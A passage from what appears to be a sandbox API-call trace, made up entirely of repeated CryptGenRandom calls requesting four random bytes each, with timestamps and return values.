hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom 